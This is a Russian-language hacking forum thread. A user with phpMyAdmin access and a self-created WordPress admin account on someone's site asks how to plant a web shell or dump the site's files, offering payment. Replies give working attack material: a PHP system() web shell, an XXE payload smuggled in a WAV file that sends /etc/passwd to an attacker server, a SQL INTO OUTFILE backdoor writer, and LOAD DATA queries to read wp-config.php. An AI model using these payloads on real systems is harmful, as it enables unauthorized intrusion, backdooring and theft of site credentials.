Как залить шелл?

[Raskolnikov]

Есть доступ к phpmyadmin + сделал админ аккаунт в wordpress, ни темы, ни плагины заливать/устанавливать нельзя. Нужен либо шелл, либо просто сдампить содержимое директории сайта

Wordpress version is 5.5.3
phpMyAdmin version is 4.4.15.10

 

[256]

/дел

 

[256]

сделал админ аккаунт в wordpress, ни темы, ни плагины заливать/устанавливать нельзя

Какая там именно проблема?

 

[Raskolnikov]

Какая там именно проблема?

Запрещено заливать плагины и темы, видимо настройка в wp-config стоит. Максимум медиафайлы и картинки можно залить

 

[barklay]

В вп же можно править шаблоны\код добавлять?

<?  system($_REQUEST['abc']); ?>

 

[k4rk4j0i]

Если можно править код шаблона, то поменяй код страницы 404 на свой шел, вызвать можно обративщийсь к не существующей странице

 

[hk111]

Максимум медиафайлы и картинки можно залить

Можно попробовать залить через аудио файл

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://your_ip:port/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Файл dtd:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://your_ip:port/?p=%file;'>" >

Подключение:

php -S 0.0.0.0:port

 

[Raskolnikov]

Если можно править код шаблона, то поменяй код страницы 404 на свой шел, вызвать можно обративщийсь к не существующей странице

Нельзя править никакой код

 

[Raskolnikov]

Можно попробовать залить через аудио файл

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://your_ip:port/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Файл dtd:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://your_ip:port/?p=%file;'>" >

Подключение:

php -S 0.0.0.0:port

msc.wav Извините, этот тип файла недопустим по соображениям безопасности.

Не даёт с таким расширением тоже

 

[hk111]

msc.wav Извините, этот тип файла недопустим по соображениям безопасности.

Не даёт с таким расширением тоже

А на сайте есть уже установленные плагины? Возможно в них уязвимости поискать

 

[Raskolnikov]

А на сайте есть уже установленные плагины? Возможно в них уязвимости поискать

Там 1 приватный плагин, исходников нет

 

[ch1pch1link]

через скулю пробовал залить ?
Будет что-то вроде
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/html/www/site.com/backdoor.php”
пути сам чекни

 

[Raskolnikov]

через скулю пробовал залить ?
Будет что-то вроде
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/html/www/site.com/backdoor.php”
пути сам чекни

Не хватает прав даже в wp-content/uploads записаться

Отблагодарю финасово за помощь

 

[Desoxyn]

У тебя есть доступ к phpmyadmin, не гони

USE test;
CREATE TEMPORARY TABLE xxx (
xxx varchar(2000)
);

LOAD DATA LOCAL INFILE '/var/www/html/wp-config.php' INTO TABLE xxx FIELDS TERMINATED BY '\n';

SELECT * FROM xxx LIMIT 0,1000;

Временные таблицы пробуй. Там еще есть варианты. Путь конечно сам подставь (я ебу какой там у тебя)

 

[Raskolnikov]

У тебя есть доступ к phpmyadmin, не гони

Временные таблицы пробуй. Там еще есть варианты. Путь конечно сам подставь (я ебу какой там у тебя)

LOAD DATA LOCAL INFILE '/var/www/.......' INTO TABLE xxx FIELDS TERMINATED BY '\n'

#1148 - The used command is not allowed with this MariaDB version


LOAD DATA LOCAL INFILE к сожалению нельзя использовать

 

[Raskolnikov]

Вознаграждение за помощь от 2к$

 

[etc/passwd]

Попробуй найти другого юзера в ПМА.
load_file работает?

 

[etc/passwd]

Попробуй найти другого юзера в ПМА.
load_file работает?

upd. Не увидел, что на into outfile нет прав, значит и load_file не работает. Или в /tmp льеться?

 

[Raskolnikov]

upd. Не увидел, что на into outfile нет прав, значит и load_file не работает. Или в /tmp льеться?

SELECT "log output data" into outfile "/var/www/site/data/bin-tmp/logs_242978432.txt"
SELECT "log output data" into outfile "/tmp/logs_242978432.txt"

Ответ MySQL:
#1045 - Access denied for user 'username'@'localhost' (using password: YES)

В обоих случаях нет прав, первый путь из phphinfo, нашёл на сервере

load_file NULL возвращает, пути для теста так же взял из phpinfo

ПРИВИЛЕГИИ:

Grants for user@localhost
GRANT USAGE ON *.* TO 'user'@'localhost' IDENTIFIED BY PASSWORD '*pwd'
GRANT ALL PRIVILEGES ON `user`.* TO 'db'@'localhost' WITH GRANT OPTION